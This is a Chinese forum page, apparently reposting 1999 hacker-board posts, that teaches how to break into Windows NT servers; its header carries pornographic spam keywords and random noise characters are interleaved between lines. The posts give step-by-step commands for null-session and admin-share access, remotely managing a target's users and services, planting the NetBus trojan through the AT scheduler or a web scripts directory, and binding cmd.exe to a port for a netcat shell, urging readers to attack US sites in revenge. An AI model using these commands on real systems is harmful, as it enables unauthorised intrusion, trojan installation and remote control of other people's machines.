久久综合伊人噜噜色,日本三级香港三级人妇电影精品,亚洲中文色资源,国产高清一区二区三区人妖
汶上信息港
標題:
關于“怎樣進入NT主機”的幾點補充
[打印本頁]
作者:
雜七雜八
時間:
2011-1-13 17:03
標題:
關于“怎樣進入NT主機”的幾點補充
《版主頁黑客工具和文章的幾個問題》中提到:
& @0 E7 m4 a7 U& C, ^; ~
請教,從版主頁上載得PINGER,GRINDER,LETMEIN等,卻不能用,PINGER安裝后,明明安裝前文件有1M多,但安裝完后生成的文件夾中只有PINGER。EXE,40多K,運行PINGER,設置好IP,點PING,彈出一個窗口(C++。。。),說出錯,然后關閉了,何故,是不是安裝有誤? 2。運行LETMEIN,彈出以下錯誤:連接文件LETMEIN。EXE到不存在的NETAPI32。DLL;NETGROUPGETUSERS。 是否說明需要NETAPI32。DLL文件,哪里有該DLL。 3。USAKILLER 的教學文章中提到需在WINNT4。0下運行以下步驟等,是否要求我的操作系統(tǒng)也是WINNT4。0 ,應該不是吧? 4。NC FOR NT 是否要求我的操作系統(tǒng)為NT,還是服務器的操作系統(tǒng)為NT? 太多的問題需高手回答,我花那么多的時間和金錢下載這幾M文件卻不能用,實在窩囊哦, 強烈建議USAKILLER 等高手級的黑客寫更多的教學文章,以提高我國黑客水平。
- F- B9 A: c! y1 x4 O
> 我的機子MMX166,WIN98,2。5G,32M內存。
5 t" u+ V2 y ~( m
0 j$ v; Y# V/ s4 Q% U: x
黑客并不神秘,你只要了解操作系統(tǒng),學習一些操作系統(tǒng)的弱點,輔助相關的工具,就可以成功。
) {7 |, ?; d9 _" |. R
你的問題是,pinger, grinder, letmein等工具必須要在NT上運行,我們強烈建議,你一定要安裝NT,對于你的機器配制,和我們現(xiàn)在差不多,只是比你多了32M內存,2G硬盤。
; x. f3 J+ _( W' H
其實,攻擊敵站,利用其操作系統(tǒng)本身的工具就可以了,比如,我們在NT上攻擊某服務器,該服務器為NT4.0,我們將做如下簡單事情就有可能成功,假設目標NT的IP地址為111.111.111.111,做法如下:
' w# t6 k0 t0 u4 w3 M/ x v+ u
net use \\111.111.111.111\ipc$ "" /user:""
1 s& O1 o, C" s3 Z {7 [0 x& i
net.exe是NT的工具文件,該命令將和目標服務器建立Null Session,如果成功,你可以查看該服務器上的共享目錄:
' B7 V' _$ W! R8 c
net view \\111.111.111.111
& b0 A( b( T# i
當然,如果你有該NT管理員密碼,就更好辦了,假設其管理員Admin密碼為fuck:
2 L8 M* R( J; ^: @! t
net use \\111.111.111.111\ipc$ "fuck" /user:"Admin"
- F( _. C7 D( E
命令成功后,幾乎所有目標NT上的配制,資源,你都可以在你本地NT上連接遠程計算機來查看或修改:
- {) }) l. M& F" U
1、查看或修改遠程機器上的硬盤,假如目標NT上有C、D兩個硬盤:
; @; ~9 @+ v8 N) V' e' d
net use x: \\111.111.111.111\c$
) f6 ~3 A# c9 p* R! L# a! Z
net use y: \\111.111.111.111\d$
3 K. u6 y/ w( ?0 V9 r9 D9 e8 |
這樣,目標NT上的C、D盤分別被影射為你本地的X、Y盤,你想怎么做都可以...
5 e. D5 I6 J9 { ?* A
2、管理目標NT的用戶:
8 ]0 x3 V- i, s& f" g4 a5 I
從“開始”->“程序”->“管理工具(公用)”->“域用戶管理器”->菜單:“用戶”->“選擇域”
% o- U% v3 N4 b' G
鍵入\\111.111.111.111后,目標NT上的所有用戶你想怎么做都可以,和管理你本地的一樣
; ~6 ~. i A+ s8 j: U# e4 \
3、管理目標NT的服務
4 y! [( ~( h: m2 x, X' o
選擇“管理工具(公用)”->“服務器管理”->“計算機”->“選擇域”
/ R* ~4 ~+ ` }
這樣你可以管理目標NT上的服務,共享目錄
% l4 D- p! y5 w8 Z1 L1 J
4、IIS管理
3 A1 c& _( @& i! E
選擇“Microsoft Internet Service管理”->“Internet 服務管理器”->"連接到服務器"->111.111.111.111
3 p, k; S8 d6 M. z
目標NT的FTP、WWW服務你就可以重新配置
* @) E9 Z) m. s! o
5、事件管理
7 B, x; A: A( u3 k2 Y6 C
“事件查看器”->連接到服務器->111.111.111.111
. l7 A# Y% P; O
9 d9 c7 R0 X/ Y1 O" ~* c. N/ Y
還有更多的東西,都可以用NT本身的功能來完成,這些都是95, 98所不能實現(xiàn)的。
/ ]2 }& N1 e5 @
2 E- u5 {9 f8 J% @4 s V$ I4 d" [
當然,98,95也能做一些事情,但很麻煩,比如:
: p ?0 Z/ V' ^+ a) V0 `
net use \\111.111.111.111\ipc$
; C( w' u. U3 c( M: }) g
net use z: \\111.111.111.111\d$
! g& d; R+ f$ D- ~# ~2 t/ S* [- q
但其后不能帶參數(shù),即改用其他用戶或密碼,系統(tǒng)將用當前用戶和密碼去登錄,如果你知道目標NT的用戶或密碼,重新啟動95, 98,改用該用戶和密碼登錄,方可實現(xiàn),你可以連接目標NT上的共享資源,但不能進行管理,如用戶、事件等
# A" p- p4 ]/ i( j5 B A
7 Q; r; \" |0 r, C; G
我們強烈建議各位有心要為死難者報仇,真正的想黑霉國的站點,花點時間,裝個NT吧,NT Workstation也可以!
" h4 h5 \) g0 P6 A3 z/ `
這樣,你還可以了解目標機器上能有什么東東供你去用!
' o% J9 _3 X7 @9 N' ]/ e
; e2 ^9 Y7 k) ~6 j. ^1 q
) G8 s5 ?1 ^- g( w) v3 Z
--------------------------------------------------------------------------------
: @0 L8 l, L: ~
( O I; U8 s8 D4 C4 j- y) z
>quack于1999-06-12,23:37:44
! T0 b0 I) L' ^& t& r7 ^
在大作《幾個有關黑的問題》中提到:
4 V* r. Y9 Q- e" H# Y8 A
首先向各位黑兄們致敬,我下了你們的傳的東東,但發(fā)現(xiàn)在用LETMEIN.EXE的時候沒有用到MYPWD的參數(shù),鍵入LETMEIN查詢其使用方法時亦無此參數(shù)項,不知為是何原因?另,用PINGER查詢到的IP地址若無機器名的是否可以直接進入,我怎么用NET USE總無法登陸?再有,假定我上傳了CIH,對了,CIH對NT暫時無效,假定上傳其它"有益"美國NT主機的東東上去,而未傳NETBUS,可否直接在其機了運行此東東使其當堂暴斃?--我曾用LEGION上美國機子,但運行程序時卻是在我的機上干活,差點把自己斃了!再有,我在微軟的CHAT中常遇到美國鬼子,在其CHAT下怎樣才能看到它的IP?怎樣把它們給KILL了?--順便說一句,我還真干掉了幾個美國人,哈!。
2 |' `( E k+ E- p0 z6 ^
! H/ A. |# A) o% C7 P
killusa于1999-06-13,03:25:15
5 O+ v( y$ L6 h( X
在大作《Re: 幾個有關黑的問題》中提到:
, I" }5 g5 }) j$ u1 a9 k
! \* v: M7 k; U
letmein.exe 暫時沒有mypwd參數(shù),十分抱歉
. a5 ?, ^, [% b
pinger程序,只是利用ping來尋找主機,每臺NT服務器有一個主IP地址,但也可以設置多個輔助IP地址,比如有些服務器供應商,一臺NT服務器上可以設置一千多個IP,每個IP對應一個Hostname,而真正能找到主機名的只有一個IP地址,就是該主機的主IP地址,所以有時顯示只有IP,而無主機名。另外,有些服務器是非NT的操作系統(tǒng),有時將不會顯示主機名。當然,有時在服務器上進行一些設置,也會出現(xiàn)上面的情況。
. ^8 R, x1 k* `) E! s
; i5 h( G9 F* }% ]
Netbus分客戶端程序ntsrv.exe和服務器端netbus.exe兩個程序,所以,netbus.exe是不用上傳的,只需在目的
4 V) h( G, g) {% h p9 @
服務器上運行ntsrv.exe,而在目的服務器運行該程序有很多種方法:
' G$ y/ F# _1 F% C& d; F
2 L/ L: w% m0 G9 x) E
1、利用服務器的 Schedule 服務來啟動schedule 服務是指在服務器上定時運行某程序,具體使用方法,可在自己的NT Dos窗口下鍵入以下:
/ }7 Y+ Y& O6 _' P! b: t8 W( E8 U. m
+ ?8 C3 ?1 Z& F. R5 n
C:\>net start schedule
5 Y( ^7 E. U9 k. t T
Schedule 正在啟動服務.....
7 \4 a/ g, r, g4 p2 \2 s' K' x& ]
Schedulw 服務啟動成功。
0 a: u# b8 B' `. c: S( w
C:\>at /?
! R, Y1 \ O5 E. ?
AT 命令排定在特定的日期和時間運行某些命令和程序。
! E& |: j# n9 Z7 n3 j6 t
運行 AT 命令之前必須先啟動 Schedule 服務。
/ z& u% H& ?. O" d1 Z
; D" Y) ?" O, B J7 R+ j% R
AT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]
d& C4 u$ E: X2 H2 c I, W
AT [\\computername] time [/INTERACTIVE]
+ _: _$ A' t# K% q( x" @/ _2 i2 F5 U
[ /EVERY:date[,...] | /NEXT:date[,...]] "command"
4 r6 i) l. q, D1 U
, p6 t. j+ C: A3 @
\\computername 指定遠程計算機。 如果省略這個參數(shù)
* L: ` P! ]8 k0 M1 l# L2 m' T
命令會被排定在本機上運行。
6 ^2 R9 C- D/ E5 v, u$ o
id 指定給排定進度命令的識別號。
8 z! m N" Y; ?1 `( B
$ T) V3 a% X# z* J3 K+ u9 q
/delete 刪除某個已排定進度的命令。如果省略標識,計算機上所有已排定進度的命令都會被刪除。
* T( z5 i0 M' l, M/ Y& m
/yes 用于刪除所有作業(yè),且不想在運行刪除時顯示確認信息 。
, U8 Q7 d) i4 w+ _
time 指定命令運行的時間。
" O1 ^. d" e+ j. y. F/ f, C, z
/interactive 允許作業(yè)在運行時,與用戶通過桌面交互。
, I) o, G, t x+ p, q( G+ K
; q& @. c# E/ Y6 K
/every:date[,...] 指定在每周或每月的某日 (或某幾日) 運行命令。
; W. H9 H+ A+ c6 a( v1 L
如果省略日期,則默認為在每月的本日運行。
6 |: @5 F* \% \1 a/ B' p4 A! ~1 F
; R/ q$ V: Q" E0 r
/next:date[,...] 指定在下一個指定日期 (如,下周三),運行命令。如果省略日期,則默認為在每月的本日運行。
3 C% m5 O; \5 m+ N7 Y6 E
6 y3 g* w$ M3 y H. C0 L8 H1 R
"command" 準備運行的 Windows NT 命令或批處理文件。
4 ?8 O6 J, p" A* C$ H- B" B( H* }
& r% s3 y( N" l% k) Z+ O" J, }! u
C:\>
( r( V$ E- _$ U: x7 Z) e# @, y2 P% \
) i1 p: S1 B* J* k: k( O, ~% ?4 e
知道了如何使用AT,再來看看如何在遠程NT上運行ntsrv.exe:
/ A% u. b, _" g+ W% e6 N
1 利用管理員登陸到目的服務器,方法為: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser"
/ A3 O4 m7 D- c% ^, Z8 m1 S* h
2 利用ntsrv.exe啟動遠程: netsvc \\x.x.x.x schedule /start
7 O+ S% p; O4 a8 m* H
3 利用AT.EXE在遠程服務器設置程序定時運行,當然最快運行最理想,所以,你可以用letmein.exe得到服務器的時間,然后:
" u' c }' B' e" ?; J
at \\x.x.x.x 00:00 ntsrv.exe /port:64321
$ w, c- z N+ v! u3 b' V
其中00:00要改為用letmein.exe得回來的具體時間+一點容量,等一會后,再在本地啟動netbus.exe,鍵入目的服務器得ip地址或hostname,連接!具體使用可參照 "How to get in nt",比如第一種方法,你想要在目的服務器運行 LEGION,可以利用netbus得上傳功能,將LEGION上傳至目的服務器,再用netbus的"Start program",鍵入完整路徑的LEGION運行程序,就ok了!第二種方法是利用netbus的“App redirect”功能,啟動遠程telnet服務,如下:在netbus中擊“App redirect”,鍵入"C:\>winnt\system32\cmd.exe",Port為:4321,服務就啟動了,然后在本地運行:nc x.x.x.x 4321,出現(xiàn)dos啟動的畫面就表示連接成功:
( n$ p8 t% n5 F0 D5 ~% W
Microsoft(R) Windows NT(TM)
: t6 v7 B' ]& }. ~ y) c
(C) Copyright 1985-1996 Microsoft Corp.
* e5 e+ S7 g/ r4 ^! Q: ^+ S4 `4 C
C:\>
* P& G Q% U- @" Z+ |% }" Y
% g7 P/ s" n. d* h" o
2、利用web啟動ntsrv.exe或其他程序在目的服務器
[4 s/ I6 F$ Y# h" m
0 T8 B; T, n4 ^) W* e$ t9 q7 A8 {( i
將ntsrv.exe 或其他運行程序Copy到目的服務器的www可執(zhí)行目錄,如cgi-bin或scripts,然后在瀏覽器鍵入url如:
% r' A' s/ F9 |# P
http://x.x.x.x/scripts/ntsrv.exe
/port:64321
* v/ K: T! b9 [6 _ J% i, T
或
http://x.x.x.x/cgi-gin/ntsrv.exe
/port:64321
5 i! v; ~/ i+ Z+ M' S
該程序就啟動了
0 x) b& a) C6 }3 C
( ^) X) X1 U S |9 e# c2 C( c
我只提這幾中方法!
" }4 O) |0 T* P
要成功,必須打好基礎工,對操作系統(tǒng)充分了解!
5 W* ]8 v/ \( x) x* G7 B. A# X
) X; Z0 @( s) G1 l6 Y; x
歡迎光臨 汶上信息港 (http://www.junkejituan.com/)
Powered by Discuz! X3.5